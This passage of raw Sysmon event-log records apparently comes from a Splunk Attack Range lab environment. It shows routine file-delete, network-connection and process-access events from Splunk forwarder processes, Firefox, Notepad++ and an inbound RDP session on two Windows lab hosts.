Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.332{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.050{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56AD311574AD9C81BC3DA78ABBF47455,SHA256=DF465B883B963E580C356A5E25BA11F5ACE43268C07EA12987EB4FB0457B7200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:29.768{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2AEB5F35477FDC00DE0561AF93DBFA8,SHA256=F91FE6ACE7624CFAAC90512682BFC1506771D1A4ED56D0BCB15B7B1D68D7A7CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:29.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EB5BBCF1B5D119A27EAA0F7F137C0F,SHA256=87D6C4C09011FAB9F412E4FB7B15A32B3762A19232DA7BDB539D5CD33EF0E136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:29.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73D62946CDDAFA22D19EE10BD42E3207,SHA256=A62B436D38039501BE801E7E17B8E38781DA998D39A276062F2503D76A65EA96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:30.800{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53C31924F3953DCE15E2C2CC2429536C,SHA256=CD72B706C0182AFE0AC74BBCB1AAF19389C46C1B4BEF2BF0429124B3DB80AC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:30.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5054D26569CC7D82579C7A25B2D1CAE,SHA256=1052A62A6B912A8AE99381CB718EAC56CF682D6C3892E007E7A12368BB78349A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:30.112{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=252575FA96828354541F18E7D02E8E46,SHA256=A11CB1F47623959C90DFF20098AEFB5303B96AFAEF1D8F74CE5922E34BAA9CA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.245{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57306-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:21.750{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51073-false10.0.1.12-8000- 23542300x80000000000000001050135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:31.963{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=2FBBB8D12E29AEC43D93E8094A566839,SHA256=EAFE069978C0F434D728C018794BE1047B7D54BFCC0490B82129AFB7E157630B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:31.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026C1CD08534EF0FB4D8D0B63FE2DACB,SHA256=0E086C96B81758DA8B1D7F9531155A62CDC4DDB78346B417DFA63576194476E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:31.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A38EEC220CDA2F593CCEED876EDEDE,SHA256=A27D241391003589C565131FD3EA3A6CD6D4DC13FB5CA5A7A3E9AF6BAEA61153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:32.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A06D0F17B0C8C54636401C1BC902E11,SHA256=5A2AAD29566794CE73E4A3EC0F1BAD8BB0E18CDA6398B98247466AA8D449C4A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:32.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D015642EDA363B2E206B64D8E67EB07,SHA256=8FDEC35BFE062CCDF4FC1D02FE2D58125393EC0C736C7512A3FEBA1A7F92F0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:33.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60F60DA8EA2E8212C0AE256CED69A16B,SHA256=375C04F0BE927B6D909CA0E8BFE560D40278E0D621CC1699E80C3340AE3DBD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:33.846{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCD19A38EA0EA2C5FC4C56F07C69143,SHA256=D3F2C437C75F605511D1DBBDF7CE27FE1E1BE19D0447EC23102049A54C9536EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:34.849{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E3B4BC7E2448C745433B3B6B15A88E4,SHA256=FA76D1214EF1C5D1D56DB87D8D1FEE0B8D76A651AC9D44988EA9A6EB453A9D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE9D8B0922EC946DF8D3A194925E43C9,SHA256=1B504D146BB55E0025AED22D7BB7FD75335B331E0B3E07D14D4C6F75B08111D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=00C351BBC8A068C03C4CC151C637CF0B,SHA256=8944EBC41B529B94CF18A8BA3851DAD66ED2343DB1AA70022D973354DC260588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D047AB7CBB9642EEB5C6E319BB339C58,SHA256=49782070D3D7235AB0B5FD458CB042342D75F7AF5ED326A120DBF82CB3001711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FD826B267869799CFE5BBDE13084E408,SHA256=7BD672E66426A0E25ED7043577FD915E0C58D6CFC82DDAF0844F4AE1BA4D3304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B93319FCAB6482AA7FA6D4BF9D2DD8A1,SHA256=39318F34D067578D140A83706EB96386EAD6DFE5D6B54DD5D5131C7A62FF0800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3ABCC88D4FC522E96DD58E1E39026DC4,SHA256=934727354BD3C59AA771345907FECFB176545F52596D77B9E56E6947D5DFB775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8F99C7F3F84F060F6E1DBF2C400E0DE2,SHA256=BCF38BC7515992C4001FE38BA4FD735BED4CDD79CC49312E25D02A7811647F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=30168161A5E42860583DA71E013239FC,SHA256=29CDF69EF87CB350AE1111E8863A941EE0962D1C8D329FBBEBC4E4165ADBB6F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C341D05F6D3B02F77E9F3B298911F438,SHA256=566EE47D22CF23114B6B09941C19012227469F97A9A3E7BF59B2D8F4160A794C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=171573CB20DDF68559E9F29482BFD48F,SHA256=4888EAAB78A3D6973989A1098637976C9A92074F3C383CA87B3AD79580F29E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=027F4B4B8F3E0F1E4F31B0882F6386CC,SHA256=DB4598C53B0C3B0ECDC77372B1723F8BE2652982C1E2329C7E94BE33C28DF7AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.908{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10FA2B36B8FD8E2AA57636C9DD4414EC,SHA256=D1386533CC9AC014E15C1C1AF37A009DAA585B36F24586096A1F40797309F2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:35.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDB1D5D743878C14DF13F5ED3543E51,SHA256=0217505D6CAE7C70B27836A2115BD179FDA05C16F2F7CFBF1B8AC20DE3186E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:35.865{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3223044A79E4AD14FC8037C05970160,SHA256=41BE0062DE16A95AA73B20A65EF233BF298D2A5A9408DE8390B4904BD37AFE18,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:34.182{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57307-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:27.617{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51074-false10.0.1.12-8000- 23542300x80000000000000001050154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF28A8575FBD60A7EFC0DDED53044616,SHA256=D7A399576C290136C8BB196645DC2EDB7E5A3489F76D67FC48E797B30C03A14E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:36.865{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422D795A92EB11D7B6AC5B7361EB2837,SHA256=5F08C57D7E1B3AE0B25B3F423CAFCE7F6B11C24D763F4CE421AFFB8FD4CD1091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A97593A9225E5F82ED9087A5394EF0C5,SHA256=F80A6FA355F533924E50F380745C05FD052EAE453AF1E367800F0E41AA958CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95F4E028F2513385B2A03A486B505647,SHA256=81AACA200B6975476B482923D83D3B2A05A671D3FF05BFBD2DC0F3F63860BA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:37.947{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0AE9E2A5468986E657380E2BE2E1CF,SHA256=7ACC3FA913EB075CBBE14796555EE1334FD26016CEEBF209324355CD43ACBA8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:37.912{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E5EC5779DFF9F1AF175D54BA2E7ED7,SHA256=BB81047F663A651EE718CA555069D5255669805BB30B7D7426C98E2E5F68C512,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:28.463{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62357-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.977{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=2D6A92A460A139279C4630A278DFEFE4,SHA256=84A579986B735C0C89DF00474840FA0C475701D0F41E0129B21F78ED049C002D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA522972EB2A6A8D38A4883168356D6,SHA256=E9337D376912F8D233C0B802F9F91DC55181CF1BC66DC3F4BA8909873F64DFA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:38.943{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4BE3E619DC6EE6D5141C30F7B9A6211,SHA256=648FC2FA52DECC2688A7A836C1650BC244CDBF1E2D158273BFB00D764F8BCB9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.562{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C5AA645F15ED149291047ED8A275E16C,SHA256=E0425EFA55D4A92744DE1B0E6335086D6D325DBFBCCB4217DD4BB368896F7EE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:39.959{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3460CD67ECF5C23E15B046EF1F30E6E6,SHA256=EBA8C82D25E5D045818D69CFE80BEE8E08BFBA180C168F486CB50244FE76FD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:39.977{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C843327E77FC36480CC0400C906CA8C3,SHA256=9A971F327F2E191A8D3020DCF8C2EEBA4FFCB043884B759DABFAA6C320FCDD40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:40.974{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7ECD9DA509E4B5BDE1840CDF0E5C447,SHA256=3C6056B5F2BBB0BBC59FFB2BAC56FF422D3A1540046ADEECEC731FF6FE7D8A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:40.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=956713282E6CC4347C1574DD85641A84,SHA256=D3D7CDCFF98EF5DFF1997BA6D949170A87467B054641D7EF2D631F85D865DBCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:39.216{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57308-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 